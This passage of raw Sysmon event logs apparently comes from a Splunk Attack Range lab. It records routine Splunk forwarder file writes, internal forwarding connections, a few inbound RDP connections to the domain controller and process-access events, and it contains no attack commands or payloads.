Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A641D9450127C57043FEB72C43A0B4E,SHA256=978631EB7D72C758E4F76666562DEFD6BB83AD1D277862147BD187FE9114F4F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808928Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:35.213{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57359-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808927Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:37.284{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C5ABF6DB2839DC6625CA48BB605F298,SHA256=BEA39F5EDB871FFAAE16E4676CF846E7AEDCD26E49C8202161AE241A1C66B354,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:30.896{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse89.248.165.74recyber.net2031-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001051883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:38.598{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=FB4B3E9E9EF39D3B8F33BCB6BFB7B8FB,SHA256=13BA1278614F201BFEAF1BF605D88D782B6117B825C80CDD0F4552B5B8827375,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:38.267{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08FD11709F98C042E7AF44C3884E780C,SHA256=AE158B9FC70F30175699549F5AB76A282A9AEE1E19FBBF7E922F0883147A575F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808929Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:38.300{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C022EA7D8D9398745A25DF5843904407,SHA256=91E422A1C8FFA569AE436ACF85A1AAA6EBA69988563FEDDF7922F04D80E1E53A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:39.551{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50D8D41D90B6D79FD064BD9E6B5872DC,SHA256=92E485E050C6EC66A4C3A6E86571EFFDD7EA4700A8C56D508895EBA6A4615947,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:39.551{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BD4BE720981E99E7BB197975454D34D,SHA256=1D25E1B996F0F6254F4423567FEDFDE914E7C1E57561EBDC2356DEC9F3F36194,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:39.282{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31144E313C16EFFF83F9FA3F733A01B3,SHA256=5DAAB570398F6A84C63B431BA54F22E8D9A6B00E8CD336DE538850F4D1F9F223,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808930Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:39.300{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC9886626D5A1787247E6601A7FCAF13,SHA256=900A65B1F4396DCB47A276B576A538B5D377E71DA3FFF0C895436E47EA245A0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808931Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:40.347{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75B48D75AC19CE10DD02AE4271FDDAA5,SHA256=DAC22BACF72A3A59CF3F59042BB0E5090F270C4B490DD7515A67529F0408FB51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:40.312{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27606DC17936B2D7477873B4580F4BDB,SHA256=E34A27A6EF4CB1C720830801120B11AB732E1D1B0E0343F3933A8C7EC769F76C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808933Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:40.354{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57360-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808932Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:41.393{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4A9BFC6897A681446C55CECA3D1FF00,SHA256=F09CC3299EFB6A23019146F1D90B03DA2B8B43A7DBC61E43EF9099B17376B3BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:41.314{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CC7380069CBA651959C94BC906D19FC,SHA256=DB5F2A4654DC694BA52C2031A9D7DC3A17AA42635EC34D024425F52420113701,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808934Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:42.425{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CABBC537C577FDC00B5870A9D450DD1,SHA256=09E49B226B598ACF613870D77667CAB8F8071A041F277FDCB6753E342C07CC00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:42.331{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B9615B6CB4A477B8EBE033380F01E56,SHA256=95B4FCA8224141B9D154A1A6AE74EA0E35A3A6C828958C649DD89D3555536EF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808935Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:43.472{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D49371A876CA84FFBAACD0AD1E5E631,SHA256=A7593E8C00635B96C44E089B21A95579D02467161EF1906776EC6FCD09510042,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:43.349{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EFCCFD2702CB24581663D078B808B36,SHA256=38BAD17AC7F5B961E6CDD23E4CE5616E3B01D1F79DEA4BFF84FD1A24AFDB15DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:34.602{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51136-false10.0.1.12-8000- 23542300x8000000000000000808936Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:44.503{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05F55C6C3B228B0383DC1D757EE77DB7,SHA256=693C43565C943D20D3C971580E7B28438B6D8656C13254D2886E813DA038B8C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:44.379{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A23EC47869058EA481F7A33071ACF60D,SHA256=5E3C78FAECD2930DA9C53EFE2E1E12E64C8427DB51500130E11A881A6751DB0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808937Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:45.534{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F2E3E31C68217DE7A72A3F9383CDD8A,SHA256=9F10FF0BD0A3E75D239F8EA53A82406773F33959B39BC99A28A4A247C3116028,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:45.410{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E2C31FFB09D3A31F9DFFF6AB251627F,SHA256=466F54299A293B4AF56403B7DDCFD7E08C7AE8B67E48AE7A61DD290A9143EB6C,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001051896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:45.247{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F8E17B0705ADBB565D140CB9A51045B,SHA256=619946971D449B60585F3A61F10D29A43D905A6959A367656C5E7CEF01826FF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:45.247{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50D8D41D90B6D79FD064BD9E6B5872DC,SHA256=92E485E050C6EC66A4C3A6E86571EFFDD7EA4700A8C56D508895EBA6A4615947,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:37.214{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse84.242.35.58static-host-84-242-35-58.awasr.om1219-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x8000000000000000808938Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:46.534{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A58A43A3B2CFBB192B9EF8F453A279F9,SHA256=6C1584E5B3053117E48FB7B623DEC84DDB354C9287DC67D4672DE2B399303B10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:46.430{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3736B0F26024EF113C2A8A2789C9CCA0,SHA256=0A1B328AD8409AA9C5814F23C34F8ED1EA13438E2A8F8C739A36CC813E73F208,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808940Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:46.354{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57361-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808939Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:47.565{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A824DAC505600A0FC5466C621AE282F2,SHA256=EF1BC01FEB4FF742896347BAB7B863BF0C3A8094B51B09601B247F47CD392437,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:47.445{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68AC9F60F8CB593438ADFA0E7B91C99E,SHA256=575AF23CDE8093A923290EF6D4B94F0DDCDC3793F6FC88AA32F8B8755F247CA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:48.461{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FCBC2E95FC63D8D3BEC39ADA799EA18,SHA256=EE8F33862C8BCDE63D706667022AC0EB5E0723E6DC2CC3237FEAA978C2CF855D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808941Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:48.566{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B80D924BAFC35F337BC45764C3E3E894,SHA256=B91334CDBE5D87F602804911C27DC3C031DA3D2C88A9DE83ED2A3A25ACF7C6F1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:39.682{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51137-false10.0.1.12-8000- 23542300x8000000000000000808942Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:49.581{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F73B910E5D25F37C40E91EF2803B5F54,SHA256=123C9EB46441D96FA223B412D4F6EAE707B12B151AA0E8A3EB3AD63F245EEF6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:49.476{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62CC0561F5EBCE2D35FB98B0EA8AF5E9,SHA256=5B070596730681D39245CEF296881BCE0FC56E92091657B9095504D9EF03DEE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808943Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:50.612{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC51AE1D160F7DE334DC127945E57151,SHA256=DDFACCE2DB16A6D4B0F9E4DCD8BD5623E811376090BD124E06B1DA9E9D297C1C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.650{466BC892-F676-60EB-997D-00000000CF01}86489616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.496{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A78D825C0CD18B54907C1EB0E0208AF,SHA256=CC56B47A8B872632008156AF63EA2C439989079A82FB872255B514E49190DDF2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.307{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F676-60EB-997D-00000000CF01}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.307{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:50.307{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.307{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:50.307{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.307{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F676-60EB-997D-00000000CF01}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.307{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F676-60EB-997D-00000000CF01}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program 